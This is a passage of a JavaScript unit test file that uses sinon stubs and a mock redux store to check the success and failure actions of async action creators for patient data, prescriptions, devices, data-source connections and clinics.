blip: { ...initialState, }, router: { location: { pathname: `data/${otherPatientId}` } } }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1); expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1); }); }); }); context('handleFetchErrors', () => { it('should trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to patient data call returning error', () => { options.initial = false; api.patientData = { get: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }; let err = new Error(ErrorMessages.ERR_FETCHING_PATIENT_DATA); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } }, { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState, router: { location: { pathname: `data/${patientId}` } } }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_PATIENT_DATA }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1); expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1); }); it('should trigger FETCH_PATIENT_DATA_FAILURE and it should call error once for a failed request due to latest pump settings upload call returning error', () => { options.initial = true; api.patientData = { get: sinon.stub() .onFirstCall().callsArgWith(2, null, patientData) .onSecondCall().callsArgWith(2, null, _.reject(patientData, { type: 'pumpSettings' })) .onThirdCall().callsArgWith(2, {status: 500, body: 'Error!'}, null), }; let err = new Error(ErrorMessages.ERR_FETCHING_LATEST_PUMP_SETTINGS_UPLOAD); err.status = 500; let expectedActions = [ { type: 'FETCH_SERVER_TIME_REQUEST'}, { type: 'FETCH_SERVER_TIME_SUCCESS', payload: { serverTime } }, { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } }, { type: 'FETCH_PATIENT_DATA_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState, router: { location: { pathname: `data/${patientId}` } } }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions[3].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_LATEST_PUMP_SETTINGS_UPLOAD }); expectedActions[3].error = actions[3].error; expect(actions).to.eql(expectedActions); expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1); expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1); }); it('should trigger FETCH_MESSAGE_THREAD_FAILURE and it should call error once for a failed request due to team notes call returning error', () => { options.initial = false; api.team = { getNotes: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null) }; let err = new Error(ErrorMessages.ERR_FETCHING_MESSAGE_THREAD); err.status = 500; let expectedActions = [ { type: 'FETCH_PATIENT_DATA_REQUEST', payload: { patientId } }, { type: 'FETCH_MESSAGE_THREAD_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchPatientData(api, options, patientId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_MESSAGE_THREAD }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patientData.get.withArgs(patientId, options).callCount).to.equal(1); expect(api.team.getNotes.withArgs(patientId).callCount).to.equal(1); }); }); }); describe('fetchSettings', () => { it('should trigger FETCH_SETTINGS_SUCCESS and it should call fetchSettings once for a successful request', () => { let patientId = 1234; let settings = { siteChangeSource: 'cannulaPrime' }; let api = { metadata: { settings: { get: sinon.stub().callsArgWith(1, null, settings) } } }; let expectedActions = [ { type: 'FETCH_SETTINGS_REQUEST' }, { type: 'FETCH_SETTINGS_SUCCESS', payload: { settings: settings } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchSettings(api, patientId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.metadata.settings.get.calledWith(patientId)).to.be.true; }); it('should trigger FETCH_SETTINGS_FAILURE and it should call fetchSettings once for a failed request', () => { let patientId = 1234; let api = { metadata: { settings: { get: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } } }; let err = new Error(ErrorMessages.ERR_FETCHING_SETTINGS); err.status = 500; let expectedActions = [ { type: 'FETCH_SETTINGS_REQUEST' }, { type: 'FETCH_SETTINGS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchSettings(api, patientId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_SETTINGS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.metadata.settings.get.calledWith(patientId)).to.be.true; }); }); describe('fetchClinicPrescriptions', () => { it('should trigger FETCH_CLINIC_PRESCRIPTIONS_SUCCESS and it should call prescription.getAllForClinic once for a successful request', () => { const clinicId = 'clinic123'; let prescriptions = [ { id: 'one' } ]; let api = { prescription: { getAllForClinic: sinon.stub().callsArgWith(1, null, prescriptions), }, }; let expectedActions = [ { type: 'FETCH_CLINIC_PRESCRIPTIONS_REQUEST' }, { type: 'FETCH_CLINIC_PRESCRIPTIONS_SUCCESS', payload: { prescriptions : prescriptions } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicPrescriptions(api, clinicId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.prescription.getAllForClinic.callCount).to.equal(1); }); it('should trigger FETCH_CLINIC_PRESCRIPTIONS_FAILURE and it should call error once for a failed request', () => { const clinicId = 'clinic123'; let api = { prescription: { getAllForClinic: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINIC_PRESCRIPTIONS); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINIC_PRESCRIPTIONS_REQUEST' }, { type: 'FETCH_CLINIC_PRESCRIPTIONS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicPrescriptions(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINIC_PRESCRIPTIONS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.prescription.getAllForClinic.callCount).to.equal(1); }); }); describe('createPrescription', () => { it('should trigger CREATE_PRESCRIPTION_SUCCESS and it should call prescription.create once for a successful request', () => { let prescription = { id: 'one' }; const clinicId = 'clinic123'; let api = { prescription: { create: sinon.stub().callsArgWith(2, null, prescription), }, }; let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_SUCCESS', payload: { prescription : prescription } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createPrescription(api, clinicId, prescription)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.prescription.create.withArgs(clinicId, prescription).callCount).to.equal(1); }); it('should trigger CREATE_PRESCRIPTION_FAILURE and it should call error once for a failed request', () => { let prescription = { id: 'one' }; const clinicId = 'clinic123'; let api = { prescription: { create: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_CREATING_PRESCRIPTION); err.status = 500; let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createPrescription(api, clinicId, prescription)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_PRESCRIPTION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.prescription.create.withArgs(clinicId, prescription).callCount).to.equal(1); }); }); describe('createPrescriptionRevision', () => { it('should trigger CREATE_PRESCRIPTION_REVISION_SUCCESS and it should call prescription.createRevision once for a successful request', () => { let prescription = { id: 'one' }; const clinicId = 'clinic123'; let api = { prescription: { createRevision: sinon.stub().callsArgWith(3, null, prescription), }, }; let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REVISION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_REVISION_SUCCESS', payload: { prescription : prescription } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createPrescriptionRevision(api, clinicId, prescription, prescription.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.prescription.createRevision.withArgs(clinicId, prescription, prescription.id).callCount).to.equal(1); }); it('should trigger CREATE_PRESCRIPTION_REVISION_FAILURE and it should call error once for a failed request', () => { let prescription = { id: 'one' }; const clinicId = 'clinic123'; let api = { prescription: { createRevision: sinon.stub().callsArgWith(3, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_CREATING_PRESCRIPTION_REVISION); err.status = 500; let expectedActions = [ { type: 'CREATE_PRESCRIPTION_REVISION_REQUEST' }, { type: 'CREATE_PRESCRIPTION_REVISION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createPrescriptionRevision(api, clinicId, prescription, prescription.id)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_PRESCRIPTION_REVISION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.prescription.createRevision.withArgs(clinicId, prescription, prescription.id).callCount).to.equal(1); }); }); describe('deletePrescription', () => { it('should trigger DELETE_PRESCRIPTION_SUCCESS and it should call prescription.delete once for a successful request', () => { let prescriptionId = 'one'; const clinicId = 'clinic123'; let api = { prescription: { delete: sinon.stub().callsArgWith(2, null), }, }; let expectedActions = [ { type: 'DELETE_PRESCRIPTION_REQUEST', payload: { prescriptionId : prescriptionId } }, { type: 'DELETE_PRESCRIPTION_SUCCESS', payload: { prescriptionId : prescriptionId } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePrescription(api, clinicId, prescriptionId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.prescription.delete.withArgs(clinicId, prescriptionId).callCount).to.equal(1); }); it('should trigger DELETE_PRESCRIPTION_FAILURE and it should call error once for a failed request', () => { let prescriptionId = 'one'; const clinicId = 'clinic123'; let api = { prescription: { delete: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_DELETING_PRESCRIPTION); err.status = 500; let expectedActions = [ { type: 'DELETE_PRESCRIPTION_REQUEST', payload: { prescriptionId : prescriptionId } }, { type: 'DELETE_PRESCRIPTION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.deletePrescription(api, clinicId, prescriptionId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DELETING_PRESCRIPTION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.prescription.delete.withArgs(clinicId, prescriptionId).callCount).to.equal(1); }); }); describe('fetchDevices', () => { it('should trigger FETCH_DEVICES_SUCCESS and it should call devices.getAll once for a successful request', () => { let devices = [ { id: 'one' } ]; let api = { devices: { getAll: sinon.stub().callsArgWith(0, null, devices), }, }; let expectedActions = [ { type: 'FETCH_DEVICES_REQUEST' }, { type: 'FETCH_DEVICES_SUCCESS', payload: { devices : devices } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchDevices(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.devices.getAll.callCount).to.equal(1); }); it('should trigger FETCH_DEVICES_FAILURE and it should call error once for a failed request', () => { let api = { devices: { getAll: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_DEVICES); err.status = 500; let expectedActions = [ { type: 'FETCH_DEVICES_REQUEST' }, { type: 'FETCH_DEVICES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchDevices(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_DEVICES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.devices.getAll.callCount).to.equal(1); }); }); describe('fetchMessageThread', () => { it('should trigger FETCH_MESSAGE_THREAD_SUCCESS and it should call error once for a successful request', () => { let messageThread = [ { message: 'Foobar' } ] let api = { team: { getMessageThread: sinon.stub().callsArgWith(1, null, messageThread) } }; let expectedActions = [ { type: 'FETCH_MESSAGE_THREAD_REQUEST' }, { type: 'FETCH_MESSAGE_THREAD_SUCCESS', payload: { messageThread : messageThread } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchMessageThread(api, 300)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.team.getMessageThread.withArgs(300).callCount).to.equal(1); }); it('should trigger FETCH_MESSAGE_THREAD_FAILURE and it should call error once for a failed request', () => { let messageThread = [ { message: 'Foobar' } ] let api = { team: { getMessageThread: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_FETCHING_MESSAGE_THREAD); err.status = 500; let expectedActions = [ { type: 'FETCH_MESSAGE_THREAD_REQUEST' }, { type: 'FETCH_MESSAGE_THREAD_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchMessageThread(api, 400)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_MESSAGE_THREAD }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.team.getMessageThread.withArgs(400).callCount).to.equal(1); }); }); describe('fetchDataSources', () => { it('should trigger FETCH_DATA_SOURCES_SUCCESS and it should call error once for a successful request', () => { let dataSources = [ { id: 'strava' }, { id: 'fitbit' }, ]; let api = { user: { getDataSources: sinon.stub().callsArgWith(0, null, dataSources) } }; let expectedActions = [ { type: 'FETCH_DATA_SOURCES_REQUEST' }, { type: 'FETCH_DATA_SOURCES_SUCCESS', payload: { dataSources : dataSources } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchDataSources(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.getDataSources.callCount).to.equal(1); }); it('should trigger FETCH_DATA_SOURCES_FAILURE and it should call error once for a failed request', () => { let api = { user: { getDataSources: sinon.stub().callsArgWith(0, {status: 500, body: 'Error!'}, null) } }; let err = new Error(ErrorMessages.ERR_FETCHING_DATA_SOURCES); err.status = 500; let expectedActions = [ { type: 'FETCH_DATA_SOURCES_REQUEST' }, { type: 'FETCH_DATA_SOURCES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchDataSources(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_DATA_SOURCES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.getDataSources.callCount).to.equal(1); }); }); describe('connectDataSource', () => { it('should trigger CONNECT_DATA_SOURCE_SUCCESS and it should call error once for a successful request', () => { let restrictedToken = { id: 'blah.blah.blah'}; let url = 'fitbit.url'; let api = { user: { createRestrictedToken: sinon.stub().callsArgWith(1, null, restrictedToken), createOAuthProviderAuthorization: sinon.stub().callsArgWith(2, null, url), } }; let expectedActions = [ { type: 'CONNECT_DATA_SOURCE_REQUEST' }, { type: 'CONNECT_DATA_SOURCE_SUCCESS', payload: { authorizedDataSource : { id: 'fitbit', url: url}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.connectDataSource(api, 'fitbit', { path: [ '/v1/oauth/fitbit' ] }, { providerType: 'oauth', providerName: 'fitbit' })); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.createRestrictedToken.withArgs({ path: [ '/v1/oauth/fitbit' ] }).callCount).to.equal(1); expect(api.user.createOAuthProviderAuthorization.withArgs('fitbit', restrictedToken.id).callCount).to.equal(1); }); it('should trigger CONNECT_DATA_SOURCE_FAILURE and it should call error once for an unexpected provider type', () => { let api = { user: { createRestrictedToken: sinon.stub(), createOAuthProviderAuthorization: sinon.stub(), } }; let err = new Error(ErrorMessages.ERR_CONNECTING_DATA_SOURCE); let expectedActions = [ { type: 'CONNECT_DATA_SOURCE_REQUEST' }, { type: 'CONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: 'Unknown data source type' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.connectDataSource(api, 'strava', { path: [ '/v1/oauth/strava' ] }, { providerType: 'unexpected', providerName: 'strava' })); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONNECTING_DATA_SOURCE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.createRestrictedToken.callCount).to.equal(0); expect(api.user.createOAuthProviderAuthorization.callCount).to.equal(0); }); it('should trigger CONNECT_DATA_SOURCE_FAILURE and it should call error once for a failed request', () => { let api = { user: { createRestrictedToken: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), createOAuthProviderAuthorization: sinon.stub(), } }; let err = new Error(ErrorMessages.ERR_CONNECTING_DATA_SOURCE); err.status = 500; let expectedActions = [ { type: 'CONNECT_DATA_SOURCE_REQUEST' }, { type: 'CONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.connectDataSource(api, 'strava', { path: [ '/v1/oauth/strava' ] }, { providerType: 'oauth', providerName: 'strava' })); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CONNECTING_DATA_SOURCE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.createRestrictedToken.withArgs({ path: [ '/v1/oauth/strava' ] }).callCount).to.equal(1); expect(api.user.createOAuthProviderAuthorization.callCount).to.equal(0); }); }); describe('disconnectDataSource', () => { it('should trigger DISCONNECT_DATA_SOURCE_SUCCESS and it should call error once for a successful request', () => { let restrictedToken = { id: 'blah.blah.blah'}; let api = { user: { deleteOAuthProviderAuthorization: sinon.stub().callsArgWith(1, null, restrictedToken), } }; let expectedActions = [ { type: 'DISCONNECT_DATA_SOURCE_REQUEST' }, { type: 'DISCONNECT_DATA_SOURCE_SUCCESS', payload: {}} ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.disconnectDataSource(api, 'fitbit', { providerType: 'oauth', providerName: 'fitbit' })); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.deleteOAuthProviderAuthorization.withArgs('fitbit').callCount).to.equal(1); }); it('should trigger DISCONNECT_DATA_SOURCE_FAILURE and it should call error once for an unexpected provider type', () => { let api = { user: { deleteOAuthProviderAuthorization: sinon.stub(), } }; let err = new Error(ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE); let expectedActions = [ { type: 'DISCONNECT_DATA_SOURCE_REQUEST' }, { type: 'DISCONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: 'Unknown data source type' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.disconnectDataSource(api, 'strava', { providerType: 'unexpected', providerName: 'strava' })); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.deleteOAuthProviderAuthorization.callCount).to.equal(0); }); it('should trigger DISCONNECT_DATA_SOURCE_FAILURE and it should call error once for a failed request', () => { let api = { user: { deleteOAuthProviderAuthorization: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), } }; let err = new Error(ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE); err.status = 500; let expectedActions = [ { type: 'DISCONNECT_DATA_SOURCE_REQUEST' }, { type: 'DISCONNECT_DATA_SOURCE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.disconnectDataSource(api, 'strava', { providerType: 'oauth', providerName: 'strava' })); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_DISCONNECTING_DATA_SOURCE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.deleteOAuthProviderAuthorization.withArgs('strava').callCount).to.equal(1); }); }); describe('getAllClinics', () => { it('should trigger GET_CLINICS_SUCCESS and it should call clinics.getAll once for a successful request', () => { let clinics = [ { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }, ]; let api = { clinics: { getAll: sinon.stub().callsArgWith(1, null, clinics), }, }; let expectedActions = [ { type: 'GET_CLINICS_REQUEST' }, { type: 'GET_CLINICS_SUCCESS', payload: { clinics : clinics, options: {} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.getAllClinics(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.getAll.callCount).to.equal(1); }); it('should trigger GET_CLINICS_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { getAll: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_GETTING_CLINICS); err.status = 500; let expectedActions = [ { type: 'GET_CLINICS_REQUEST' }, { type: 'GET_CLINICS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.getAllClinics(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_GETTING_CLINICS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getAll.callCount).to.equal(1); }); }); describe('createClinic', () => { it('should trigger CREATE_CLINICS_SUCCESS and it should call clinics.create once and redirect to "clinic-admin" for a successful request', () => { let clinicReturn = { id: 'new_clinic_id' }; let api = { clinics: { create: sinon.stub().callsArgWith(1, null, clinicReturn) }, }; let expectedActions = [ { type: 'CREATE_CLINIC_REQUEST' }, { type: 'CREATE_CLINIC_SUCCESS', payload: { clinic : clinicReturn } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/clinic-admin' ], method: 'push', }, } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createClinic(api)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.create.callCount).to.equal(1); }); it('should trigger CREATE_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { create: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_CREATING_CLINIC); err.status = 500; let expectedActions = [ { type: 'CREATE_CLINIC_REQUEST' }, { type: 'CREATE_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.createClinic(api)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CREATING_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.create.callCount).to.equal(1); }); }); describe('fetchClinic', () => { it('should trigger FETCH_CLINIC_SUCCESS and it should call clinics.get once for a successful request', () => { let clinic = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }; let api = { clinics: { get: sinon.stub().callsArgWith(1, null, clinic), }, }; let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_SUCCESS', payload: { clinic : clinic } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinic(api, '5f85fbe6686e6bb9170ab5d0')); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.get.callCount).to.equal(1); }); it('should trigger FETCH_CLINIC_FAILURE and it should call error once for a failed request', () => { let api = { clinics: { get: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINIC); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINIC_REQUEST' }, { type: 'FETCH_CLINIC_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinic(api, '5f85fbe6686e6bb9170ab5d0')); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINIC }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.get.callCount).to.equal(1); }); }); describe('fetchClinicsByIds', () => { it('should trigger FETCH_CLINICS_BY_IDS_SUCCESS and it should call clinics.get twice for a successful request', () => { let clinic1 = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }; let clinic2 = { id: '12f2f123s2e1f1f3s2e11535', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }; let api = { clinics: { get: sinon.stub() .onCall(0).callsArgWith(1, null, clinic1) .onCall(1).callsArgWith(1, null, clinic2), }, }; let expectedActions = [ { type: 'FETCH_CLINICS_BY_IDS_REQUEST' }, { type: 'FETCH_CLINICS_BY_IDS_SUCCESS', payload: { clinics : { [clinic1.id]: clinic1, [clinic2.id]: clinic2, } } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicsByIds(api, [clinic1.id, clinic2.id])); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.get.callCount).to.equal(2); }); it('should trigger FETCH_CLINICS_BY_IDS_FAILURE and it should call error once for a failed request', () => { let clinic1 = { id: '5f85fbe6686e6bb9170ab5d0', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }; let clinic2 = { id: '12f2f123s2e1f1f3s2e11535', address: '1 Address Ln, City Zip', name: 'Clinic1', phoneNumbers: [{ number: '(888) 555-5555', type: 'Office' }], }; let api = { clinics: { get: sinon.stub() .onCall(0).callsArgWith(1, null, clinic1) .onCall(1).callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_FETCHING_CLINICS_BY_IDS); err.status = 500; let expectedActions = [ { type: 'FETCH_CLINICS_BY_IDS_REQUEST' }, { type: 'FETCH_CLINICS_BY_IDS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.fetchClinicsByIds(api, [clinic1.id, clinic2.id])); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_BY_IDS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.get.callCount).to.equal(2); }); }); describe('updateClinic', () => { it('should trigger UPDATE_CLINIC_SUCCESS and it should call clinics.update once for a successful request', () => { let api = { clinics: { update: sinon.stub().callsArgWith(2, null, { name: 'newName' }), }, }; let expectedActions = [ { type: 